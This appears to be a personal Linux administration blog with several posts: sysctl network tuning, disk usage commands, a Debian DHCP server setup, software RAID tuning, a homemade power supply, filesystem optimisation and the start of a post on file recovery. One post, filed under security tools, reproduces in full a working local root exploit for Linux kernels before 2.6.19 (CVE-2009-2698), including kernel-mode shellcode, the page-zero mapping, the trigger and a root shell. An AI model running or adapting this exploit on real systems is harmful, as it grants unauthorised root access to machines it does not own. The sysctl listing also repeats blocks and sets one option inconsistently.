Mar 08

Tunning Kernel Parameters Improving Linux Network Performance

By jason Linux/Unix Oprating system No Comments »

By tunning kernel parameters can improve linux socket io performance.  The settings for sysctl.conf below apply for Fedora, RedHat, Centos OS as well as other Linux flavors. These settings will improve your server network performance and some little protection against ddos attacks as well.

# Kernel sysctl configuration file for Red Hat Linux
#
# For binary values, 0 is disabled, 1 is enabled. See sysctl(8) and
# sysctl.conf(5) for more details.

# Disables packet forwarding
net.ipv4.ip_forward=0

# Disables IP source routing
net.ipv4.conf.all.accept_source_route = 0
net.ipv4.conf.lo.accept_source_route = 0
net.ipv4.conf.eth0.accept_source_route = 0
net.ipv4.conf.default.accept_source_route = 0

# Enable IP spoofing protection, turn on source route verification
net.ipv4.conf.all.rp_filter = 1
net.ipv4.conf.lo.rp_filter = 1
net.ipv4.conf.eth0.rp_filter = 1
net.ipv4.conf.default.rp_filter = 1

# Disable ICMP Redirect Acceptance
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.lo.accept_redirects = 0
net.ipv4.conf.eth0.accept_redirects = 0
net.ipv4.conf.default.accept_redirects = 0

# Enable Log Spoofed Packets, Source Routed Packets, Redirect Packets
net.ipv4.conf.all.log_martians = 0
net.ipv4.conf.lo.log_martians = 0
net.ipv4.conf.eth0.log_martians = 0

# Disables IP source routing
net.ipv4.conf.all.accept_source_route = 0
net.ipv4.conf.lo.accept_source_route = 0
net.ipv4.conf.eth0.accept_source_route = 0
net.ipv4.conf.default.accept_source_route = 0

# Enable IP spoofing protection, turn on source route verification
net.ipv4.conf.all.rp_filter = 1
net.ipv4.conf.lo.rp_filter = 1
net.ipv4.conf.eth0.rp_filter = 1
net.ipv4.conf.default.rp_filter = 1

# Disable ICMP Redirect Acceptance
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.lo.accept_redirects = 0
net.ipv4.conf.eth0.accept_redirects = 0
net.ipv4.conf.default.accept_redirects = 0

# Disables the magic-sysrq key
kernel.sysrq = 0

# Decrease the time default value for tcp_fin_timeout connection
net.ipv4.tcp_fin_timeout = 15

# Decrease the time default value for tcp_keepalive_time connection
net.ipv4.tcp_keepalive_time = 400

# Turn off the tcp_window_scaling
net.ipv4.tcp_window_scaling = 0

# Turn off the tcp_sack
net.ipv4.tcp_sack = 0

# Turn off the tcp_timestamps
net.ipv4.tcp_timestamps = 0

# Enable TCP SYN Cookie Protection
net.ipv4.tcp_syncookies = 1

# Lower syn retry rates
net.ipv4.tcp_synack_retries = 2
net.ipv4.tcp_syn_retries = 3

# Enable ignoring broadcasts request
net.ipv4.icmp_echo_ignore_broadcasts = 1

# Enable bad error message Protection
net.ipv4.icmp_ignore_bogus_error_responses = 1

# Log Spoofed Packets, Source Routed Packets, Redirect Packets
net.ipv4.conf.all.log_martians = 1

# Increases the size of the socket queue (effectively, q0).
net.ipv4.tcp_max_syn_backlog = 1024

# Increase the tcp-time-wait buckets pool size
net.ipv4.tcp_max_tw_buckets = 1440000

# Allowed local port range
net.ipv4.ip_local_port_range = 16384 65536

Tagged with:
Mar 07

Linux Check Disk Space with the Commands du and df

By jason Linux/Unix Oprating system 2 Comments »

To get a summary of the available and used disk space on your Linux system is to type in the df command in a terminal window. The command df stands for "disk filesystem". With the -h option (df -h) it shows the disk space in "human readable" form, which in this case means, it gives you the units along with the numbers.

The output of the df command is a table with four columns. The first column contains the file system path, which can be a reference to a hard disk or another storage device, or a file system connected through the network. The second column shows the capacity of that file system. The third column shows the available space, and the last column shows the path on which that file system is mounted. The mount point is the place in the directory tree where you can find and access the that file system.

The du command on the other hand shows the disk space used by the files and directories in the current directory. Again the -h option (df -h) makes the output easier to comprehend.

By default, the du command lists all subdirectories to show how much disk space each has occupied. This can be avoided with the -s option (df -h -s). This only shows a summary. Namely the combined disk space used by all subdirectories. If you want to show the disk usage of a directory (folder) other than the current directory, you simply put that directory name as the last argument. For example: du -h -s website, where "website" would be a subdirectory of the current directory.

Tagged with:
Mar 05

Install DHCP-SERVER in Linux Debian

By jason Linux/Unix Oprating system 2 Comments »

 

Installing  DHCP Server in debian linux is not that hard actually…

I assume you have the following configuration on your host:

2 internal nics:
eth0 (For internal  )
eth1 (for internet)

1. Setting up your eth0 for dhcp use

The most important thing you need to do is configuring static ip adresses.

I will use the following IP adress 192.168.10.x as my ip-adress range.

We type the following command: nano /etc/network/interfaces

And be sure the settings are the same as below:

auto eth0
iface eth0 inet static
address 192.168.10.1
netmask 255.255.255.0
network 192.168.10.0
broadcast 192.168.10.255

After you have modified the file press control+x you will get a confirmation telling you to save the file yes or no.. We do Y and press Enter

restart the network interface type:


/etc/init.d/networking restart

And press enter.

2. Install and configure the dhcp server

If you have completed the step above we are going to install the dhcp and configure it.

First lets install the module:

apt-get install dhcp3-server

After a while it gives a blue screen with a warning. Just press enter and let him install.

When it finished installing the server will not start. We need to bind him to a interface and give a IP range to lease.

2.1 Binding the interface

Enter the following command

nano /etc/default/dhcp3-server

Press enter

Edit the following line

INTERFACES=”"
To
INTERFACES=”eth1″

After you have modified the file press control+x you will get a confirmation telling you to save the file yes or no.. We do Y and press Enter

2.2 configuring the DHCP Release

We are at the final step and after that we have a full DHCP Server Running!

We are not going to use the default config file of the dhcp server however we are going to keep a copy of the config file.

go to the following directory:

cd /etc/dhcp3/

Make a backup copy of the following config file by typing the following command:

cp dhcpd.conf dhcpd.old.conf

And press Enter.

Now remove the file that you have backuped

rm dhcpd.conf

We make the new dhcpd.conf in this step as I promised type:

nano dhcpd.conf

Now  copy/paste the following data into the file

subnet 192.168.10.0 netmask 255.255.255.0 {
range 192.168.10.10 192.168.10.100;
option domain-name-servers 192.168.1.1;
option domain-name “Failserver.nl”;
option netbios-name-servers 192.168.10.1;
option routers 192.168.10.1;
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.10.255;
default-lease-time 86400;
max-lease-time 676800;
}

After you have modified the file press control+x you will get a confirmation telling you to save the file yes or no.. We do Y and press Enter

Now restart the DHCP3 server

/etc/init.d/dhcp3-server restart

Tagged with:
Mar 04

Linux software RAID 5 very slow

By jason Linux/Unix Oprating system 1 Comment »

Here I am going to tell about  Linux software RAID. If it’s very slow,you can test it with my way, hope it can help you.
So I had a ASUS P6T motherboard which has Intel ICH10R raid controller, 3x 1 Tb SATA 2 HDDs and Intel Core i7 920 processor. So I wanted to install Fedora 10 on that machine.
After configuring RAID 5 in the BIOS I booted the Fedora 10 installation DVD to start the installation. BUT! Suddenly I saw that Anaconda see 3 separate hard drives instead of 1 RAID device. After some googleing I figured out that my motherboard don’t have real RAID controller. Instead it is fakeraid controller. It is just software raid which software is located in BIOS. So I decided to use linux software raid, because it is definitely better than the from ASUS.
So installed Fedora 10 with linux software RAID 5 with LUKS encryption. After installation machine started to work very slowly. I thought it so because of the encryption, but after some googleing I understood that the encryption can’t slow down the machine that way. The thing was when you newly create RAID 5 array it needs to build the 3rd hard drive and it take a lot of time. It took from me approximately 4 hours to finish that operation on 1 Tb hard drives. You can check the rebuild status at any time invoking one of the following commands:

# cat /proc/mdstat

or

# mdadm --detail /dev/md0

After rebuild was over and after some tunings , I had ~90 Mb/s write and ~200 Mb/s read.

Tuning parameters was:

echo 32768 > /sys/block/md0/md/stripe_cache_size
blockdev --setra 65536 /dev/md0
Tagged with:
Feb 27

Homemade Bench top Power Supply

By jason Linux/Unix Oprating system No Comments »

I’ve always had an interest for electronics and recently I’ve been exploring my interests more. Last week I sorted through my tub of parts and placed them in individual draws. It took a good while to sort everything but I think it was worth it. I’ve seen power supplies built from PC power supplies before so I thought I’d build one my self. Thing is, I never really got around to it.

Yesterday I was feeling rather ambitious and decided to make a bench top power supply for small electronics. All the sites I found I have lost, so I kind of made it up as I went along. Most of them used ATX power supplies that are readily available, but I opted for the easy way out and used an AT with a hard on/off switch. At first this was the only reason I used it, but there are more advantages to using a AT over an ATX power supply for an external power supply. Firstly, it was cheap, well free actually. I took it from a PC that I had modified some time ago. I have a box full of AT power supplies in storage that I’ll get to some time and replace it. But I won’t be using the PC it came out of for a while, mostly because I have toaster ovens that are faster. Another reason it is better than a ATX is it has less voltages. The only voltages listed are 12v, 5v, -5v (7v) and GND. They vary in amps but are sufficient for what I will be using it for. It made it easy not to screw it up since there wasn’t many wires.

To make it was really easy. I took the top off. Drilled 4 holes in the case and inserted the insulated terminal, checking to make sure they didn’t ground out on the case. Cut most of the cables, leaving a couple of molex’s hanging out just in case I need them. I then soldered the remaining wires to a terminal by voltage (Yellow +12, Red +5, Red +/-5, Black GND.) It might not be the prettiest of them all, but I think it will do its job well.

Tagged with:
Sep 02

Linux Kernel < 2.6.19 udp_sendmsg Local Root Exploit

By jason Security Tools 2 Comments »

/***********************************************************
* hoagie_udp_sendmsg.c
* LOCAL LINUX KERNEL ROOT EXPLOIT (< 2.6.19) – CVE-2009-2698
*
* udp_sendmsg bug exploit via (*output) callback function
* used in dst_entry / rtable
*
* Bug reported by Tavis Ormandy and Julien Tinnes
* of the Google Security Team
*
* Tested with Debian Etch (r0)
*
* $ cat /etc/debian_version
* 4.0
* $ uname -a
* Linux debian 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686 GNU/Linux
* $ gcc hoagie_udp_sendmsg.c -o hoagie_udp_sendmsg
* $ ./hoagie_udp_sendmsg
* hoagie_udp_sendmsg.c – linux root < 2.6.19 local
* -andi / void.at
*
* sh-3.1# id
* uid=0(root) gid=0(root) Gruppen=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(andi)
* sh-3.1#
*
* THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-
* CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY
* DAMAGE DONE USING THIS PROGRAM.
*
* VOID.AT Security
* andi@void.at
* http://www.void.at
*
************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <sys/mman.h>

/**
* this code will be called from NF_HOOK via (*output) callback in kernel mode
*/
void set_current_task_uids_gids_to_zero() {
   asm("push %eax\n"
       "movl $0xffffe000, %eax\n"
       "andl %esp, %eax\n"
       "movl (%eax), %eax\n"
       "movl $0×0, 0×150(%eax)\n"
       "movl $0×0, 0×154(%eax)\n"
       "movl $0×0, 0×158(%eax)\n"
       "movl $0×0, 0×15a(%eax)\n"
       "movl $0×0, 0×160(%eax)\n"
       "movl $0×0, 0×164(%eax)\n"
       "movl $0×0, 0×168(%eax)\n"
       "movl $0×0, 0×16a(%eax)\n"
       "pop  %eax\n");
}

int main(int argc, char **argv) {
   int s;
   struct msghdr header;
   struct sockaddr_in sin;
   char *rtable = NULL;

   fprintf(stderr,
           "hoagie_udp_sendmsg.c – linux root <= 2.6.19 local\n"
                  "-andi / void.at\n\n");

   s = socket(PF_INET, SOCK_DGRAM, 0);
   if (s == -1) {
      fprintf(stderr, "[*] can’t create socket\n");
      exit(-1);
   }

   /**
    * initialize required variables
    */
   memset(&header, 0, sizeof(struct msghdr));
   memset(&sin, 0, sizeof(struct sockaddr_in));
   sin.sin_family = AF_INET;
   sin.sin_addr.s_addr = inet_addr("127.0.0.1");
   sin.sin_port = htons(22);
   header.msg_name = &sin;
   header.msg_namelen = sizeof(sin);

   /**
    * and this is the trick:
    * we can use (*output)(struct sk_buff*) from dst_entry (used by rtable) as a callback (=> offset 0×74)
    * so we map our rtable buffer at offset 0 and set output callback function
    *
    * struct dst_entry
    * {
    *         struct dst_entry        *next;
    *         atomic_t                __refcnt;       client references
    *         int                     __use;
    *         struct dst_entry        *child;
    *         struct net_device       *dev;
    *         short                   error;
    *         short                   obsolete;
    *         int                     flags;
    * #define DST_HOST                1
    * #define DST_NOXFRM              2
    * #define DST_NOPOLICY            4
    * #define DST_NOHASH              8
    * #define DST_BALANCED            0×10
    *         unsigned long           lastuse;
    *         unsigned long           expires;
    *
    *         unsigned short          header_len;     * more space at head required *
    *         unsigned short          trailer_len;    * space to reserve at tail *
    *
    *         u32                     metrics[RTAX_MAX];
    *         struct dst_entry        *path;
    *
    *         unsigned long           rate_last;      * rate limiting for ICMP *
    *         unsigned long           rate_tokens;
    *
    *         struct neighbour        *neighbour;
    *         struct hh_cache         *hh;
    *         struct xfrm_state       *xfrm;
    *
    *         int                     (*input)(struct sk_buff*);
    *         int                     (*output)(struct sk_buff*);
    *
    * #ifdef CONFIG_NET_CLS_ROUTE
    *         __u32                   tclassid;
    * #endif
    *
    *         struct  dst_ops         *ops;
    *         struct rcu_head         rcu_head;
    *
    *         char                    info[0];
    * };
    *
    * struct rtable
    * {
    *         union
    *         {
    *                 struct dst_entry        dst;
    *                 struct rtable           *rt_next;
    *         } u;
    *
    *         struct in_device        *idev;
    *
    *         unsigned                rt_flags;
    *         __u16                   rt_type;
    *         __u16                   rt_multipath_alg;
    *
    *         __be32                  rt_dst; * Path destination     *
    *         __be32                  rt_src; * Path source          *
    *         int                     rt_iif;
    *
    *         * Info on neighbour *
    *         __be32                  rt_gateway;
    *
    *         * Cache lookup keys *
    *         struct flowi            fl;
    *
    *         * Miscellaneous cached information *
    *          __be32                  rt_spec_dst; * RFC1122 specific destination *
    *         struct inet_peer        *peer; * long-living peer info *
    * };
    *
    */
   rtable = mmap(0, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
   if (rtable == MAP_FAILED) {
      fprintf(stderr, "[*] mmap failed\n");
      exit(-1);
   }
   *(int *)(rtable + 0×74) = (int)set_current_task_uids_gids_to_zero;

   /* trigger exploit
    *
    * the second sendmsg() call will call ip_append_data() with rt == NULL
    * because of:
    * if (up->pending) {
    *          *
    *          * There are pending frames.
    *          * The socket lock must be held while it’s corked.
    *          *
    *          lock_sock(sk);
    *          if (likely(up->pending)) {
    *                    if (unlikely(up->pending != AF_INET)) {
    *                            release_sock(sk);
    *                            return -EINVAL;
    *                    }
    *                    goto do_append_data;
    *            }
    *            release_sock(sk);
    *    }
    *
    */
   sendmsg(s, &header, MSG_MORE|MSG_PROXY);
   sendmsg(s, &header, 0);

   close(s);

   system("/bin/sh");

   return 0;
}

Tagged with:
Aug 20

Linux Optimizing Filesystems

By jason Linux/Unix Oprating system 2 Comments »

If you’ve already installed Linux, your partitions are already set up and configured with particular filesystems. You may decide you want to modify this configuration, though. Some changes are tedious to implement. For instance, changing from one filesystem to another requires you to back up, create a new filesystem, and restore your files. One exception to this rule is changing from ext2fs to ext3fs. If you switch filesystems, you may be able to use filesystem-creation options to improve the performance of the new filesystem. Other changes can also be done relatively painlessly. These include defragmenting a disk (that is, repositioning file contents so that they’re not spread out over the entire partition) and resizing partitions to give you space where you need it.

Creating a Filesystem for Optimal Performance

Most filesystems support a variety of options that may impact performance. For instance, large allocation blocks can improve performance by reducing fragmentation and the number of operations needed to retrieve an entire file. Some of these options can be set only at filesystem creation time, but some can be changed after the fact. Not all of these features are available in all filesystems. Across all Linux filesystems, important and popular performance-enhancing (or performance-degrading) options include:

Allocation Block Size  As noted in the earlier section, "Minimizing Space Consumption," small allocation blocks can facilitate more efficient use of disk space, but the cost is a small degradation in disk-access speed. Therefore, to improve performance slightly, you can increase your block size. This option is not easily changed after creating a filesystem. With ext2fs or ext3fs, you can use the -b block-size option to mke2fs; with XFS, the -b size=block-size option to mkfs.xfs does the job. For ext2fs and ext3fs, block-size must be 1024, 2048, or 4096; with XFS, the block size can theoretically be any power-of-two multiple of 512 bytes up to 64KB (65536 bytes), although in practice you can only mount a filesystem with block sizes up to 4KB or 8KB using common CPUs. ReiserFS and Linux’s version of JFS do not yet support adjusting this feature.

Journaling Options  All the journaling filesystems support various journal options. One common option is the location of the journal. By placing the journal on a separate physical disk from the main filesystem, you can improve performance (provided the target disk isn’t too sluggish itself). You can use the -J device=journal-device option in mke2fs or the -j journal-device option in mkreiserfs or mkfs.jfs to set this feature. Ext3fs also supports setting the journal size with the -J size=journal-size option, where journal-size is specified in megabytes and must be between 1,024 and 102,400 filesystem blocks. Specifying a too-small journal may degrade performance, but setting one too large may rob you of too much disk space. If in doubt, let mke2fs decide on the journal size itself.

Reserved Blocks  Ext2fs and ext3fs reserve a number of blocks for use by the superuser (or some other user you specify). The default value of 5 percent reserved space may be overkill on large partitions or on less critical partitions (such as /home). You can gain a bit more space by using the -m reserved-percentage option to mke2fs. Changing this percentage won’t affect actual disk performance, but it may gain you just a bit more available disk space. You can change this option after you create a filesystem by passing the same parameter that mke2fs accepts to the tune2fs program, as in tune2fs -m 1 /dev/hda4 to set the reserved blocks percentage to 1.

Check Interval  Ext2fs and ext3fs force a filesystem check after a specified number of mounts or a specified amount of time between mounts. The idea is to catch errors that might creep onto the filesystem due to random disk write errors or filesystem driver bugs. You can change these intervals by using the -c max-mount-counts and -i interval-between-checks options to tune2fs. For the latter option, you specify an interval in days, weeks, or months by providing a number followed by a d, w, or m, respectively. Altering the check interval won’t modify day-to-day performance, but it will change how frequently the computer performs a full disk check on startup. This disk check can be quite lengthy, even for ext3fs; it doesn’t restrict itself to recent transactions as recorded in the journal, as a forced check after a system crash does.

Directory Hash  ReiserFS uses a sorted directory structure to speed directory lookups, and mkreiserfs provides several options for the hash (a type of lookup algorithm) used for this purpose. You set this option with the -h hash option to mkreiserfs, where hash can be r5, rupasov, or tea. Some hashes may yield improved or degraded performance for specific applications. The Squid Web proxy documentation suggests using the rupasov hash, whereas the qmail documentation recommends r5, for instance. One problem with the r5 and rupasov hashes is that they can greatly slow file creation in directories with very many (a million or so) files. In fact, rupasov is very prone to such problems, and so should be avoided on most systems. The tea hash is much less subject to this problem, but it is also much slower than r5 for directories with more typical numbers of files. In general, you should use the default r5 hash unless you know you’ll be creating many files or the disk will be used by one performance-critical application, in which case checking the application’s documentation or doing a web search for advice may be worthwhile.

Inode Options  XFS enables you to set the inode size at filesystem creation time using the -i size=value option to mkfs.xfs. The minimum and default size is 256 bytes; the maximum is 2,048 bytes. (The inode size can’t exceed half the allocation block size, though.) One impact of the inode size option relates to small file access times; because XFS tries to store small files within the inode whenever possible, specifying a large inode enables storing larger files within the inode. Doing so will speed access to these files. Therefore, if a partition will store many small files (under 2KB), you may want to increase the inode size. Depending on the exact mix of file sizes, the result may save or waste disk space. If few files will be smaller than 2KB, there’s little point to increasing the inode size.

The default filesystem creation options usually yield acceptable performance. Modifying these options can help in some unusual cases, such as filesystems storing huge numbers of files or a computer that’s restarted frequently. I don’t recommend trying random changes to these options unless you intend to run tests to discover what works best for your purposes.

Converting Ext2fs to Ext3fs

One of the advantages of ext3fs over the other journaling filesystems is that it’s easy to turn an existing ext2 filesystem into an ext3 filesystem. You can do this using the tune2fs program and its -j option: 

# tune2fs -j /dev/hda4

If the filesystem to which you add a journal is mounted when you make this change, tune2fs creates the journal as a regular file, called .journal, in the filesystem’s root directory. If the filesystem is unmounted when you run this command, the journal file doesn’t appear as a regular file. In either case, the filesystem is now an ext3 filesystem, and it can be used just as if you created it as an ext3 filesystem initially. If necessary, you may be able to access the filesystem as ext2fs (say, using a kernel that has no ext3fs support); however, some older kernels and non-Linux utilities may refuse to access it in this way, or they may provide merely read-only access.

On rare occasion, an ext3 filesystem’s journal may become so corrupted that it interferes with disk recovery operations. In such cases, you can convert the filesystem back into an ext2 filesystem using the debugfs tool: 

# debugfs -w /dev/sda4
debugfs 1.32 (09-Nov-2002)
debugfs:  features -needs_recovery -has_journal
Filesystem features: dir_index filetype sparse_super
debugfs:  quit

After performing this operation, you should be able to use fsck.ext2 with its -f option, as described in the upcoming section, "Filesystem Check Options," to recover the filesystem. The newly-deactivated journal will cause fsck.ext2 to report errors even if the filesystem did not previously have them. If you like, you can then add the journal back by using tune2fs, as just described.

Warning

Don’t try to remove the journal from a mounted filesystem.

Defragmenting a Disk

Microsoft filesystems, such as the File Allocation Table (FAT) filesystem and the New Technology File System (NTFS), suffer greatly from disk fragmentation—the tendency of files to be broken up into many noncontiguous segments. Disk fragmentation degrades performance because the OS may need to move the disk head more frequently and over greater distances to read a fragmented file than to read a nonfragmented file.

Fortunately, Linux’s native filesystems are all far more resistant to fragmentation than are Windows filesystems. Therefore, most Linux users don’t bother defragmenting their disks. In fact, defragmentation tools for Linux are hard to come by. One that does exist is called defrag, but this package doesn’t ship with most distributions. Because it is an older tool, it won’t work with most modern ext2fs partitions, much less any of the journaling filesystems.

If you think your system may be suffering from fragmentation problems, you can at least discover how fragmented your ext2 or ext3 filesystems are by performing an fsck on them. You may need to force a check by using the -f parameter. This action will produce, among other things, a report on the fragmentation on the disk: 

/dev/hda5: 45/8032 files (2.2% non-contiguous), 4170/32098 blocks

This report indicates that 2.2 percent of the files are noncontiguous (that is, fragmented). Such a small amount of fragmentation isn’t a problem. Unfortunately, the fsck tools for other journaling filesystems don’t return this information, so you have no indicator of fragmentation on these filesystems. If you truly believe that fragmentation has become a problem, you may be able to improve matters by backing up the partition, creating a fresh filesystem, and then restoring the files. This procedure is likely to take far longer than the time saved in disk accesses over the next several months or years, though, so I only recommend doing it if you want to change filesystem types or have some other reason (such as replacing a hard disk) to engage in this activity.

Note

As a general rule, fragmentation becomes a problem only if your disk is almost full. On a nearly full disk, Linux may have trouble locating a large enough block of free space to fit a file without fragmenting it. If you almost fill a disk and then delete files, the remaining files may or may not be fragmented, depending on which ones you deleted. For this reason, keeping your partitions from filling up is best. As a general rule, anything less than 80 to 90 percent full is fine from a fragmentation perspective.

Resizing Filesystems

All too frequently, you discover only after installing Linux that your partitions aren’t the optimum size. For instance, you might have too much room in /usr and not enough room in /home. Traditional fixes for this problem include using symbolic links to store some directories that are nominally on one partition on another partition; and backing up, repartitioning, and restoring data. In many cases, a simpler approach is to use a dynamic partition resizer. Fortunately, partition resizers exist for the most popular Linux filesystems, as well, so you can use these tools to manage your Linux installation.

Warning

Dynamic partition resizers are inherently dangerous. In the event of a power outage, system crash, or bug, they can do serious damage to a partition. You should always back up the data on any partition you resize. Also, you should never run a dynamic partition resizer on a partition that’s currently mounted. If necessary, boot a Linux emergency system to resize your partitions.

Resizing Ext2fs and Ext3fs

Several tools exist to resize ext2 and ext3 filesystems:

resize2fs  This program ships with the e2fsprogs package included with most distributions. The resize2fs program is fairly basic in terms of options. At a minimum, you pass it the device file associated with the partition, as in resize2fs /dev/hda4. This command resizes the filesystem on /dev/hda4 to match the size of the partition. You can also pass the partition size in allocation blocks, as in resize2fs /dev/hda4 256000 to resize a filesystem to 256,000 blocks. The resize2fs program doesn’t resize partitions, just the filesystems they contain. Therefore, you must use resize2fs in conjunction with fdisk to resize a partition and its filesystem. If you want to shrink a filesystem, you should do so first and then use fdisk to shrink the partition to match. If you want to grow a partition, you use fdisk first and then resize2fs. Because getting filesystem and partition sizes to match is tricky, it’s usually best to forgo resize2fs in favor of GNU Parted or PartitionMagic.

GNU Parted  This program provides both filesystem and partition resizing at once, so it’s easier to use than resize2fs. It’s described in more detail shortly, in "Using GNU Parted."

PartitionMagic  This commercial program from PowerQuest (http://www.powerquest.com) supports integrated filesystem and partition resizing operations of FAT, NTFS, ext2fs, ext3fs, and Linux swap partitions. PartitionMagic is easier to use than other ext2fs and ext3fs partition resizers, but it runs only from DOS or Windows. (The package ships with a DOS boot floppy image and a bootable CD-ROM, so it’s still useable on a Linux-only system.)

Resizing ReiserFS

Two tools are available for resizing ReiserFS:

resize_reiserfs  This tool is ReiserFS’s equivalent of the resize2fs program. Like resize2fs, resize_reiserfs resizes the filesystem, but not the partition in which it resides, so you must use this tool in conjunction with fdisk. If you only pass the program the partition identifier, it resizes the filesystem to fit the partition. If you pass an -s option and filesystem size, the program resizes the partition to the requested size, which you can specify in bytes, kilobytes, megabytes, or gigabytes (the last three options require K, M, or G suffixes, respectively). Alternatively, you can specify a change to the partition size by prefixing the size with a minus (-) or plus (+) sign. For instance, resize_reiserfs -s -500M /dev/sda5 reduces the size of the filesystem on /dev/sda5 by 500MB.

GNU Parted  According to its web page, this program supports ReiserFS as well as other filesystems. Unfortunately, as of version 1.6.4, this support is more theoretical than real, because it relies on libraries that aren’t present on most distributions, and that even a fresh build can’t find when everything’s installed according to directions. With luck, though, this support will improve in the future.

The ReiserFS resizing tools are not as mature as are those for resizing ext2 and ext3 filesystems. In fact, resize_reiserfs displays warnings about the software being beta.

Resizing XFS

XFS has long included a partition-resizing tool, xfs_growfs. As the name implies, this program is designed for increasing a filesystem’s size, not decreasing it. Unlike most partition-resizing tools, xfs_growfs is designed to work only on a mounted filesystem. The safest way to use it is to unmount the filesystem, delete the partition using fdisk, create a new partition in its place, mount the filesystem, and then call xfs_growfs: 

# xfs_growfs /mount/point

As you might guess, /mount/point is the partition’s mount point. You may also add the -D size option to specify the filesystem size in allocation blocks. Various other options are also available, as described in the xfs_growfs man page.

Although GNU Parted’s web page doesn’t mention XFS support, the source code does include an XFS subdirectory. Parted refuses to work on XFS partitions, but this may change in the future.

Resizing JFS

JFS includes a rather unusual partition-resizing ability: It’s built into the kernel’s JFS driver. You can use this feature to increase, but not to decrease, the size of the filesystem. As with most other partition-resizing tools, you must modify the partition size first by using fdisk to delete the partition and then recreate it with a larger size. After you’ve done this, you should mount the partition as you normally do and then issue the following command:

# mount -o remount,resize /mount/point

This command resizes the filesystem mounted at /mount/point to occupy all the available space in its partition. No other partition-resizing tools are available for JFS, although there is a JFS subdirectory in the GNU Parted source code, suggesting that Parted may support JFS in the future.

Using GNU Parted

Because Parted is the most sophisticated open source partition resizer, it deserves more attention. You can pass it a series of commands directly or use it in an interactive mode. The latter is more likely to be helpful for normal one-time uses. Passing commands to Parted enables you to write scripts to help automate partition resizing. Typically, you launch Parted in interactive mode by typing the program’s name followed by the device on which you want to operate. You can then type commands to resize, create, delete, and otherwise manipulate partitions:

# parted /dev/sda
(parted) print
Disk geometry for /dev/scsi/host0/bus0/target5/lun0/disc: 0.000-96.000 megabytes
Disk label type: msdos
Minor    Start       End     Type      Filesystem  Flags
1          0.023     48.000  primary   ext2
2         48.000     96.000  primary   ext2
(parted) rm 2
(parted) resize 1 0.00 96.00
(parted) quit

This example deletes the second partition on the disk and resizes the first partition to fill all the available space. Unlike most Linux partition-management tools, Parted works in figures of megabytes. This fact can make translating Parted’s partition start and end points to and from the cylinder boundaries upon which fdisk and other tools work tricky. Table 1 summarizes some of the most common and important Parted commands. Although many commands nominally require arguments, in practice they don’t; instead, they prompt for the required information when Parted is run in interactive mode. The part-type code is p for primary partitions, e for extended partitions, and l for logical partitions.

Table 1: Common Parted Commands

Parted Command

Effect

help [command]

Displays information on how to use a command. If the command option is omitted, it displays a summary of all commands.

mkfs partn fstype

Creates a filesystem of fstype on partition number partn.

mkpart part-type [fstype] start end

Creates a partition, giving it the partition type code part-type, with start and end as its start and end points.

mkpartfs part-type fstype start end

Works like mkpart, but also creates a filesystem in the new partition.

move partn start end

Moves the partition to a new location on the disk.

print [partn]

Displays the partition table or, if partn is specified, more detailed information on the partition.

rescue start end

Attempts to recover a partition that was deleted.

resize partn start end

Resizes the specified partition to the specified size.

rm partn

Deletes the specified partition.

select device

Begins editing a new disk device.

 

Resizing Partitions

Most of the filesystem-resizing tools require that you modify the partition using fdisk. (GNU Parted and PartitionMagic are exceptions to this rule.) Precisely how you modify the filesystem’s carrier partition depends on whether you’ll be shrinking or growing the partition. The simplest case is growing a partition. When doing this, you should follow these steps:

  1. Launch fdisk on the disk in question.

  2. Type d in fdisk to delete the partition you want to grow. You’ll be asked for the partition number.

  3. Type n in fdisk to create a new partition in place of the old one. You’ll be asked for the partition number and the start and end cylinders. The start cylinder must be the same as it was originally, and of course the end cylinder should be larger than the original.

  4. Type w in fdisk to write your changes to disk and exit.

  5. Follow the procedure for your filesystem-resizing tool to increase the filesystem size.

Of course, in order to grow a partition, there must be free space on the disk into which to expand the partition. This normally means that you’ll have already deleted or shrunk a partition that follows the one you want to expand. If you want to expand a filesystem into space that’s before it on the disk, your job is much harder. It’s possible to expand the carrier partition as just described, but specifying an earlier starting point, and then use dd to copy a filesystem from later in the new partition to earlier in the partition. This task is tricky, though, because you must compute precisely how far into the newly expanded partition the existing filesystem begins. An error can easily wipe out all your data. Thus, I don’t recommend attempting this task; instead, try creating a new filesystem in the earlier space and mount it at some convenient place in your directory tree. If the empty space is larger than the partition you want to move, you can create a new partition, move the original, verify that the copied partition is intact, delete the original partition, and expand the copied partition and the filesystem it contains.

In order to reduce the size of the filesystem, you must match the size of the partition to the filesystem, which can be a tricky task. Fortunately, there is a procedure that can make this task less error-prone:

  1. Shrink the filesystem, using your filesystem-resizing tool, to a value that’s smaller than you intend. For instance, if you want to shrink a 700MB partition to 500MB, shrink it to 400MB.

  2. Use fdisk to resize the partition to the target size, such as 500MB. This target size should be larger than the filesystem by a wide enough margin to be comfortable.

  3. Use the partition-resizing tool to expand the filesystem into the extra space on the partition, filling it exactly.

As with increasing the size of the filesystem, the start point of the filesystem must remain untouched. When moving space between filesystems, this requirement can create an awkward situation: You can shrink an earlier partition, but expanding the next partition into the freed space is risky.

Tagged with:
Aug 18

Linux Recovering Deleted Files

By jason Linux/Unix Oprating system 1 Comment »

Recovering Deleted Files

Perhaps the most common type of filesystem problem is files that are accidentally deleted. Users frequently delete the wrong files or delete a file only to discover that it’s actually needed. Windows system users may be accustomed to undelete utilities, which scour the disk for recently deleted files in order to recover them. Unfortunately, such tools are rare on Linux. You can make undeletion easier by encouraging the use of special utilities that don’t really delete files, but instead place them in temporary holding areas for deletion later. If all else fails, you may need to recover files from a backup.

Trash Can Utilities

